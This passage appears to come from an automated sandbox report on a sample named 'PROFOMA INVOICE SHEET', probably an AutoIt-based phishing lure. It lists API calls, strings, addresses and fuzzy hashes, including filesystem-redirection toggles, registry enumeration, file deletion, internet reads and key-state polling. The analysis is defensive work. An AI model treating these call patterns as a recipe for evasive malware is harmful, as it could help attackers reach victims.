                                    • Instruction Fuzzy Hash: 18418D71A04204AFDB16CF54C895A9A7BB9EF44318F5584A9FD059F20ED7B1D940CBA0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _wcslen
                                    • String ID: HKEY_LOCAL_MACHINE$HKLM
                                    • API String ID: 176396367-4004644295
                                    • Opcode ID: 53f60a182fbb159bd993918a2ea1b51c5c92e19ce0b7552ad42b29bfbacb2df4
                                    • Instruction ID: 25e404b31c417936e429da84b9a5aaba18a2a56db7d285a0e64314f76fb08f74
                                    • Opcode Fuzzy Hash: 53f60a182fbb159bd993918a2ea1b51c5c92e19ce0b7552ad42b29bfbacb2df4
                                    • Instruction Fuzzy Hash: 2D310933A202694BCB2BFF6C98505BF33A15BA1750B07509AEC51AB345EA75CD4097B0
                                    APIs
                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00392F8D
                                    • LoadLibraryW.KERNEL32(?), ref: 00392F94
                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00392FA9
                                    • DestroyWindow.USER32(?), ref: 00392FB1
                                    Strings
                                    Similarity
                                    • API ID: MessageSend$DestroyLibraryLoadWindow
                                    • String ID: SysAnimate32
                                    • API String ID: 3529120543-1011021900
                                    • Opcode ID: 04d80ed92464a698b3added1c922753bb7fe5a361a61bec71a6917fc8ca1ebe4
                                    • Instruction ID: 6d07cc64c35c77fb5da078c53149257aa068ebbf4055bd6013d9b4452b497692
                                    • Opcode Fuzzy Hash: 04d80ed92464a698b3added1c922753bb7fe5a361a61bec71a6917fc8ca1ebe4
                                    • Instruction Fuzzy Hash: 0821FD72204A05BBEF128F64DC80FBB77BDEB59364F110619F952D6090C331DC519760
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00324D1E,003328E9,?,00324CBE,003328E9,003C88B8,0000000C,00324E15,003328E9,00000002), ref: 00324D8D
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00324DA0
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00324D1E,003328E9,?,00324CBE,003328E9,003C88B8,0000000C,00324E15,003328E9,00000002,00000000), ref: 00324DC3
                                    Strings
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: 22604253c199c190b67969a946f30f49b17a9b092b190181ab12ddc191752986
                                    • Instruction ID: 2ce7a92ccf17e3c1de5bcf26499dd66804d0bf1d564fdca907df65d1f5a39648
                                    • Opcode Fuzzy Hash: 22604253c199c190b67969a946f30f49b17a9b092b190181ab12ddc191752986
                                    • Instruction Fuzzy Hash: A0F06234A50218BBDB179F90EC49BEDBFB9EF44751F4101A5F80AA2261CB329D40CB94
                                    APIs
                                    • LoadLibraryA.KERNEL32 ref: 0035D3AD
                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0035D3BF
                                    • FreeLibrary.KERNEL32(00000000), ref: 0035D3E5
                                    Strings
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID: GetSystemWow64DirectoryW$X64
                                    • API String ID: 145871493-2590602151
                                    • Opcode ID: 0c6eb9192d7b6fe707e4de3b2d6ab7586a3cc7612402d64be1ed2988005fc6a1
                                    • Instruction ID: 3bab1e451e1edab37a6ece71daa0f1b545a3edfb76476b45024c0846605236e4
                                    • Opcode Fuzzy Hash: 0c6eb9192d7b6fe707e4de3b2d6ab7586a3cc7612402d64be1ed2988005fc6a1
                                    • Instruction Fuzzy Hash: D4F02039806A20DBDB3357208C48DA97228AF00703F52996AEC03E2534DB30CD88CA82
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00304EDD,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304E9C
                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00304EAE
                                    • FreeLibrary.KERNEL32(00000000,?,?,00304EDD,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304EC0
                                    Strings
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                    • API String ID: 145871493-3689287502
                                    • Opcode ID: 1e39a12ded61c9098c51fa808649e4eb93b7976ecc98c96672dad38aefd659d2
                                    • Instruction ID: 9ed52ae4693e45b9fca6ffd672d92ace62e0c2825bc6f36d57a20ffc5e4e51c2
                                    • Opcode Fuzzy Hash: 1e39a12ded61c9098c51fa808649e4eb93b7976ecc98c96672dad38aefd659d2
                                    • Instruction Fuzzy Hash: 74E08635A135225BD2231725BC28B9BA558AF81B62F064116FD05D2150DB60CE0281E4
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00343CDE,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304E62
                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00304E74
                                    • FreeLibrary.KERNEL32(00000000,?,?,00343CDE,?,003D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00304E87
                                    Strings
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                    • API String ID: 145871493-1355242751
                                    • Opcode ID: 14f6baeee700b54e06d7b543f24a40af8131087b5d66d18172334fb125d9fb07
                                    • Instruction ID: 853ed282dc256f0331fca2faab0d023f7b6271856025dac05709d607b7ebda36
                                    • Opcode Fuzzy Hash: 14f6baeee700b54e06d7b543f24a40af8131087b5d66d18172334fb125d9fb07
                                    • Instruction Fuzzy Hash: E9D01235513621579A231B25BC28ECB6A1CAF85B51746551AFA09E2194CF62CE01C5D4
                                    APIs
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00372C05
                                    • DeleteFileW.KERNEL32(?), ref: 00372C87
                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00372C9D
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00372CAE
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00372CC0
                                    Similarity
                                    • API ID: File$Delete$Copy
                                    • String ID:
                                    • API String ID: 3226157194-0
                                    • Opcode ID: 536cc17077e9d8990494c9abb86b8bfc2881e01fcede52dd4ce7faddcbc1a008
                                    • Instruction ID: 711d07ebcb857d36461641aa9145ff58bf035d12545e3b6cbd33c51f92668dd5
                                    • Opcode Fuzzy Hash: 536cc17077e9d8990494c9abb86b8bfc2881e01fcede52dd4ce7faddcbc1a008
                                    • Instruction Fuzzy Hash: 1CB16F71901129ABDF26DFA4CC85EDFB7BDEF49350F1080AAF509EA141EB349A448F61
                                    APIs
                                    • GetCurrentProcessId.KERNEL32 ref: 0038A427
                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0038A435
                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0038A468
                                    • CloseHandle.KERNEL32(?), ref: 0038A63D
                                    Similarity
                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                    • String ID:
                                    • API String ID: 3488606520-0
                                    • Opcode ID: b2b2602e6009fb00616044082bb5de39c08ae513bd077cb78faf235c385180d9
                                    • Instruction ID: 76567e245d6e8b8ec6a23296e11f06b656aedf81fcfdf99dd168340dad0386a7
                                    • Opcode Fuzzy Hash: b2b2602e6009fb00616044082bb5de39c08ae513bd077cb78faf235c385180d9
                                    • Instruction Fuzzy Hash: 37A1D4716047019FE725EF28C892F2AB7E5AF84714F14885DF5999B3D2DBB0EC408B92
                                    APIs
                                      • Part of subcall function 0036DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0036CF22,?), ref: 0036DDFD
                                      • Part of subcall function 0036DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0036CF22,?), ref: 0036DE16
                                      • Part of subcall function 0036E199: GetFileAttributesW.KERNEL32(?,0036CF95), ref: 0036E19A
                                    • lstrcmpiW.KERNEL32(?,?), ref: 0036E473
                                    • MoveFileW.KERNEL32(?,?), ref: 0036E4AC
                                    • _wcslen.LIBCMT ref: 0036E5EB
                                    • _wcslen.LIBCMT ref: 0036E603
                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0036E650
                                    Similarity
                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                    • String ID:
                                    • API String ID: 3183298772-0
                                    • Opcode ID: a43b15e4bf766a028373fc93ddabe129147926f3ea3603ed8df5461c0c899dff
                                    • Instruction ID: 63945ffa7a30176b9a264152ca2827a4b03ba121d408b463522f3c98c7ba09e9
                                    • Opcode Fuzzy Hash: a43b15e4bf766a028373fc93ddabe129147926f3ea3603ed8df5461c0c899dff
                                    • Instruction Fuzzy Hash: DB5185B24083845BC726EBA0DC919DF73ECAF85340F00891EF689D7195EF74A68C875A
                                    APIs
                                      • Part of subcall function 00309CB3: _wcslen.LIBCMT ref: 00309CBD
                                      • Part of subcall function 0038C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0038B6AE,?,?), ref: 0038C9B5
                                      • Part of subcall function 0038C998: _wcslen.LIBCMT ref: 0038C9F1
                                      • Part of subcall function 0038C998: _wcslen.LIBCMT ref: 0038CA68
                                      • Part of subcall function 0038C998: _wcslen.LIBCMT ref: 0038CA9E
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0038BAA5
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0038BB00
                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0038BB63
                                    • RegCloseKey.ADVAPI32(?,?), ref: 0038BBA6
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0038BBB3
                                    Similarity
                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                    • String ID:
                                    • API String ID: 826366716-0
                                    • Opcode ID: 8284c96e5ce535f3989381c312c71bf2cfb2393575062e4112556355838ccae9
                                    • Instruction ID: f9ce27b0c68c4bb58ea8638f038776e9b16e06bc7e2fdd47b0f7b000a601fd89
                                    • Opcode Fuzzy Hash: 8284c96e5ce535f3989381c312c71bf2cfb2393575062e4112556355838ccae9
                                    • Instruction Fuzzy Hash: 4B619131209342AFD716EF14C490E2ABBE9FF84308F55859DF4994B2A2DB31ED45CB92
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 00368BCD
                                    • VariantClear.OLEAUT32 ref: 00368C3E
                                    • VariantClear.OLEAUT32 ref: 00368C9D
                                    • VariantClear.OLEAUT32(?), ref: 00368D10
                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00368D3B
                                    Similarity
                                    • API ID: Variant$Clear$ChangeInitType
                                    • String ID:
                                    • API String ID: 4136290138-0
                                    • Opcode ID: 625c35dc4682a2e18d50bd594e72af654658074e4a0518d6593224b028808092
                                    • Instruction ID: 7719785b85951fe6f14556e69b517031ac28c4464a8f2c75f2f1bf94caeb2164
                                    • Opcode Fuzzy Hash: 625c35dc4682a2e18d50bd594e72af654658074e4a0518d6593224b028808092
                                    • Instruction Fuzzy Hash: AF5169B5A00219EFCB15CF68C884AAAB7F8FF8D314F158559E905DB354E730E911CBA0
                                    APIs
                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00378BAE
                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00378BDA
                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00378C32
                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00378C57
                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00378C5F
                                    Similarity
                                    • API ID: PrivateProfile$SectionWrite$String
                                    • String ID:
                                    • API String ID: 2832842796-0
                                    • Opcode ID: 6acb566ac4586e216b20fa71301aae6697b40dc9b7b7cfa52d4423428d28e4c4
                                    • Instruction ID: f031b8d0eb0f2428ed7db351cc06196fd297f78cd8fdcd5828608ba52be5260b
                                    • Opcode Fuzzy Hash: 6acb566ac4586e216b20fa71301aae6697b40dc9b7b7cfa52d4423428d28e4c4
                                    • Instruction Fuzzy Hash: 8D517B34A002159FCB16DF64C894AAABBF5FF49314F08C458E849AB3A2CB35ED41CB90
                                    APIs
                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00388F40
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00388FD0
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00388FEC
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00389032
                                    • FreeLibrary.KERNEL32(00000000), ref: 00389052
                                      • Part of subcall function 0031F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00371043,?,753CE610), ref: 0031F6E6
                                      • Part of subcall function 0031F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0035FA64,00000000,00000000,?,?,00371043,?,753CE610,?,0035FA64), ref: 0031F70D
                                    Similarity
                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                    • String ID:
                                    • API String ID: 666041331-0
                                    • Opcode ID: 80e1c39f852f0bffe04174b3690f5dee57ac763ffb63e92dd41f7e521e9eac91
                                    • Instruction ID: 48b345b044d32a535b4dd0c9b59e8a4cb7e5e1cd6c49397bce050c05954635d4
                                    • Opcode Fuzzy Hash: 80e1c39f852f0bffe04174b3690f5dee57ac763ffb63e92dd41f7e521e9eac91
                                    • Instruction Fuzzy Hash: 08515A74601205DFCB12EF58C4949ADBBF1FF49314B4980A9E90AAF362DB31ED85CB90
                                    APIs
                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00396C33
                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00396C4A
                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00396C73
                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0037AB79,00000000,00000000), ref: 00396C98
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00396CC7
                                    Similarity
                                    • API ID: Window$Long$MessageSendShow
                                    • String ID:
                                    • API String ID: 3688381893-0
                                    • Opcode ID: e9def57d6b29ccdada8aa958dbc7d7e693f7e83260a03e393c77f611815f0334
                                    • Instruction ID: e3ba327179b3dd290fd815e165cd516475ef26541a84fd76ec7569e9a58d0692
                                    • Opcode Fuzzy Hash: e9def57d6b29ccdada8aa958dbc7d7e693f7e83260a03e393c77f611815f0334
                                    • Instruction Fuzzy Hash: 1E41D735605104AFDF26CF68CC56FB97BA9EB09350F160229F899A72E0D371ED41CE90
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 11872eb9e4e44bf6d2280c0065630830a020dd0f1b8aaaf3ac03a9787ce13d69
                                    • Instruction ID: fe3ac360da5f1eb330cffb46649903a9ca7180df5e50c294442f514f2c2f190a
                                    • Opcode Fuzzy Hash: 11872eb9e4e44bf6d2280c0065630830a020dd0f1b8aaaf3ac03a9787ce13d69
                                    • Instruction Fuzzy Hash: 23419032A00210AFCB26DF78C9C1A5AB7B5EF89714F1645A9E515EB351D631ED01CB90
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 00319141
                                    • ScreenToClient.USER32(00000000,?), ref: 0031915E
                                    • GetAsyncKeyState.USER32(00000001), ref: 00319183
                                    • GetAsyncKeyState.USER32(00000002), ref: 0031919D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: AsyncState$ClientCursorScreen
                                    • String ID:
                                    • API String ID: 4210589936-0
                                    • Opcode ID: e634294f341a8bb3b25a9cc20a0aefc98ec4bb680a03b62ee2e909ecdbea2789
                                    • Instruction ID: 4ece6d1f812f78e19d35fe93ef970b7fdf3950779f8f1e3f5c664eb5b75229a7
                                    • Opcode Fuzzy Hash: e634294f341a8bb3b25a9cc20a0aefc98ec4bb680a03b62ee2e909ecdbea2789
                                    • Instruction Fuzzy Hash: F041627190851ABBDF1A9F64D858BEEB774FB09320F214226E825A72E0C7306D94CF51
                                    APIs
                                    • GetInputState.USER32 ref: 003738CB
                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00373922
                                    • TranslateMessage.USER32(?), ref: 0037394B
                                    • DispatchMessageW.USER32(?), ref: 00373955
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00373966
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                    • String ID:
                                    • API String ID: 2256411358-0
                                    • Opcode ID: 3a75239fcd476a95168cb4a5042327e1f2f2235d9950c082cff8cc834929ce5e
                                    • Instruction ID: 60f35fa73069d436567a79660a52470a82876319508993de0699ad3a43f9b1cf
                                    • Opcode Fuzzy Hash: 3a75239fcd476a95168cb4a5042327e1f2f2235d9950c082cff8cc834929ce5e
                                    • Instruction Fuzzy Hash: 8431EB70515341BFEB37CB74E848BB677ECEB07300F05855ED56A82590D3B99684EB11
                                    APIs
                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0037C21E,00000000), ref: 0037CF38
                                    • InternetReadFile.WININET(?,00000000,?,?), ref: 0037CF6F
                                    • GetLastError.KERNEL32(?,00000000,?,?,?,0037C21E,00000000), ref: 0037CFB4
                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,0037C21E,00000000), ref: 0037CFC8
                                    • SetEvent.KERNEL32(?,?,00000000,?,?,?,0037C21E,00000000), ref: 0037CFF2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                    • String ID:
                                    • API String ID: 3191363074-0
                                    • Opcode ID: bc9c1998909f8f74d224103ae080de4ca65e7e9ebfa8c593ab21834bb4770028
                                    • Instruction ID: 9fa3ec7f78bc8a36f65b8d31f1869c339ebd260a4192ef04558f86583dbe372f
                                    • Opcode Fuzzy Hash: bc9c1998909f8f74d224103ae080de4ca65e7e9ebfa8c593ab21834bb4770028
                                    • Instruction Fuzzy Hash: C4317C71610205EFDB36DFA5D884AABBBFDEB04310B10942EF50AD2101DB34AE40DB60
                                    APIs
                                    • GetWindowRect.USER32(?,?), ref: 00361915
                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 003619C1
                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 003619C9
                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 003619DA
                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 003619E2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessagePostSleep$RectWindow
                                    • String ID:
                                    • API String ID: 3382505437-0
                                    • Opcode ID: 3276086adec8afe6aa860ecc9525a77e7355aa3e312d8c7726f50984087bb6db
                                    • Instruction ID: dfd628bbb010f19541967cfeca5b58b864899e3c9ae917fafd7230b7f4001c5e
                                    • Opcode Fuzzy Hash: 3276086adec8afe6aa860ecc9525a77e7355aa3e312d8c7726f50984087bb6db
                                    • Instruction Fuzzy Hash: 2131C271A00219EFCB01CFA8CD99ADE7BB5EB04315F148225F921A72D1C7709D44CB90
                                    APIs
                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00395745
                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 0039579D
                                    • _wcslen.LIBCMT ref: 003957AF
                                    • _wcslen.LIBCMT ref: 003957BA
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00395816
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: MessageSend$_wcslen
                                    • String ID:
                                    • API String ID: 763830540-0
                                    • Opcode ID: 36047ba6ae8185d88bc0f415cf5d26561bb2717bbf7a2f75f4f5e3e00b8b5bcb
                                    • Instruction ID: 4495026ba1a1d093043d0a1714357bbd94d69105c7bf86ca519c3a8bac11face
                                    • Opcode Fuzzy Hash: 36047ba6ae8185d88bc0f415cf5d26561bb2717bbf7a2f75f4f5e3e00b8b5bcb
                                    • Instruction Fuzzy Hash: 0A218271904618AADF239FA1DC85AEEB7BCFF04724F108216F929EA180D7708AC5CF50
                                    APIs
                                    • IsWindow.USER32(00000000), ref: 00380951
                                    • GetForegroundWindow.USER32 ref: 00380968
                                    • GetDC.USER32(00000000), ref: 003809A4
                                    • GetPixel.GDI32(00000000,?,00000003), ref: 003809B0
                                    • ReleaseDC.USER32(00000000,00000003), ref: 003809E8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$ForegroundPixelRelease
                                    • String ID:
                                    • API String ID: 4156661090-0
                                    • Opcode ID: b7d0f475026306f8962e54736f52d5901c0fa1714bba6883e800480a760df6ea
                                    • Instruction ID: 9b766a3d5be95dca8fb95becdcfcae2c7babd7e7df72a9bd04e2c2d213d96d8f
                                    • Opcode Fuzzy Hash: b7d0f475026306f8962e54736f52d5901c0fa1714bba6883e800480a760df6ea
                                    • Instruction Fuzzy Hash: 22219036610204AFD715EF69CC94AAEBBF9EF49700F048069F85ADB762DB30AC44CB50
                                    APIs
                                    • GetEnvironmentStringsW.KERNEL32 ref: 0033CDC6
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0033CDE9
                                      • Part of subcall function 00333820: RtlAllocateHeap.NTDLL(00000000,?,003D1444,?,0031FDF5,?,?,0030A976,00000010,003D1440,003013FC,?,003013C6,?,00301129), ref: 00333852
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0033CE0F
                                    • _free.LIBCMT ref: 0033CE22
                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0033CE31
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                    • String ID:
                                    • API String ID: 336800556-0
                                    • Opcode ID: 036c1ac2ef932366fa9b57e3aea672486808d17c883e9ef768c5dac8f6c126e5
                                    • Instruction ID: a057ea88b8da195396100c09e4697a9510524e11867390e6302db4c80fab92ad
                                    • Opcode Fuzzy Hash: 036c1ac2ef932366fa9b57e3aea672486808d17c883e9ef768c5dac8f6c126e5
                                    • Instruction Fuzzy Hash: 6A01FC726112157F732326766CCCD7B796DDEC6BA2B15112AFD05E7101DA618D0183B0
                                    APIs
